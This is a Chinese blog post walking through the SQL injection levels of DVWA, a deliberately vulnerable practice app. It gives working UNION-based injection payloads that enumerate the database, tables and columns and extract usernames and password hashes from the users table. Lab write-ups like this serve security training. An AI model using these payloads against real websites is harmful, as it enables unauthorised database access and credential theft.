DVWA靶场—sql闯关

最新推荐文章于 2023-06-27 22:57:57 发布
最新推荐文章于 2023-06-27 22:57:57 发布
阅读量207 收藏
点赞数
分类专栏: sql注入 文章标签: 网络安全 sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oiadkt/article/details/130317898
版权

部署靶场就不再赘述了,修改难度后自行开始闯关吧~

目录

LOW

Medium

High

LOW

  • 看到这种框框首先判断是什么类型的注入,先给个 ’ 进行探测,发现单引号会报错,但是双引号不会报错,所以闭合是 ' 号

  • 然后继续使用order by 探测列数,探测为2的时候显示正常,为3时就报错,所以确定列数是2列

 

  • 然后再使用联表查询,爆出数据库名,得到dvwa的数据库名
1' union select database(),2#

  • 再通过数据库名爆出表名,得到表guestbook和users;
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

  • 得到表名后再爆出列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#

  • 最后直接爆出username和password的字段信息
1' union select group_concat(user),group_concat(password) from users#

 

Medium

  • 看到这里感觉和pikachu的某一关很像,这里先抓包看看,感觉是个post请求

  • 先尝试给一个 引号 ,看看是否会报错,看到有斜杆,应该是被转译了

  • 尝试给了双引号,也会报错,通过之前的抓包分析,发现id选择可能都是数字,不是字符型的,或许不需要闭合

  • 去掉引号,直接使用 order by探测,发现是可以探测出来的,列数是两列

  • 直接使用 union select 查询数据库名
id=1 union select 1,database()&Submit=Submit

  • 接下来的步骤和上面一样,爆表名,列名,最后得到用户信息

High

  • 发现这关是带弹窗的,老办法,先使用1' 进行探测,发现报错

  • 再使用 1" 进行探测,发现页面恢复正常

  • 所以确认是 单引号闭合,先尝试直接order by 探测列数看是否可以探测

    order by 2显示正常

 order by 3显示报错

  • 探测出列数为两列,所以直接使用 union select 查询数据库名

  • 然后根据数据库名,爆出表名
 1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

  • 根据数据库名和表名,爆出列名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa'#

  • 最后联合重要的列名,和表名,爆出其中的数据
1' union select group_concat(user),group_concat(password) from users#

kukuromi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
DVWA靶场SQL注入
剁椒鱼头没剁椒的博客
12-13 5423
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
DVWA靶场-sql注入(sqlInjection)
zeroone的博客
03-10 5850
第七关:SQL Injection       SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 Low <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[
DVWA靶场-SQL Injection SQL注入
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
06-06 1210
往期博文: DVWA靶场-Brute Force Source 暴力破解 DVWA靶场-Command Injection 命令注入 DVWA靶场-CSRF 跨站请求伪造 DVWA靶场-File Inclusion 文件包含 DVWA靶场-File Upload 文件上传 靶场环境搭建 https://github.com/ethicalhack3r/DVWA [网络安全学习篇附]:DVWA 靶场搭建 目录 SQL Injection Low SQL Injection..
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 1万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
DVWA靶场 -SQL注入-low
sanqin_的博客
05-17 463
先在输入框输入1看看结果是什么   在url测试常见的?id=1和 and1=1 , and1=2 和 ’and’1’=1 , ’and’1’=2 后页面无变化  因此直接选择在输入框进行简单测试操作 通常查询语句为:   Select * form 表名 where id=’xx’;   首先尝试输入单引号 ’ ,将引号合并让其报错,即输入后的语句为 Select * form 表名 where id=’ ’ ’;(假设是这个常见的查询语句) 输入结果:  页面报错,该页面可能存在注入漏洞  在输入框
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA靶场源码分享
12-11
学习使用,大家一起进步,此资源是为了无法在github上临时下载的同学分享,以备用,不需要积分,如果被调整了积分请联系UP主
DVWA靶场通关(SQL注入)
m0_56010012的博客
03-09 1万+
SQL Injection(SQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入常规思路
Kali linux在DVWA靶场SQL注入
qq_74298120的博客
06-20 1554
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 845
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名。
DVWA综合靶场练习:SQL injection-低中高
流浪法师的博客
05-26 202
DVWA综合靶场练习:SQL injection-低中高
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 362
下图为源码中提交表单action='#'的作用是将数据提交到当前页面。
dvwa靶场sql注入(low)
qq_14902381的博客
08-22 377
dvwa 靶场sql注入(low)
DVWA靶场SQL注入通关详解
qq_62169455的博客
06-27 2744
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
sql手工注入dvwa初级靶场
太阳照耀我走四方
02-13 1427
sql手工注入dvwa靶场
DVWA靶场的XSS和SQL注入实战
bwxzdjn的博客
03-25 879
对XSS和SQL注入学习后的实操,主要是借助DVWA靶场,通过对不同分类和过滤的实战,进一步掌握不同分类的XSS和SQL注入攻击方法。(不包含不可能章节)
dvwa靶场sql注入
最新发布
08-15
DVWA靶场中,SQL注入是其中一个常见的漏洞。 SQL注入是一种利用现有应用程序的漏洞,将恶意的SQL命令插入到Web表单提交或输入的查询字符串中,从而欺骗服务器执行恶意的SQL命令。攻击者可以利用SQL注入来绕过应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值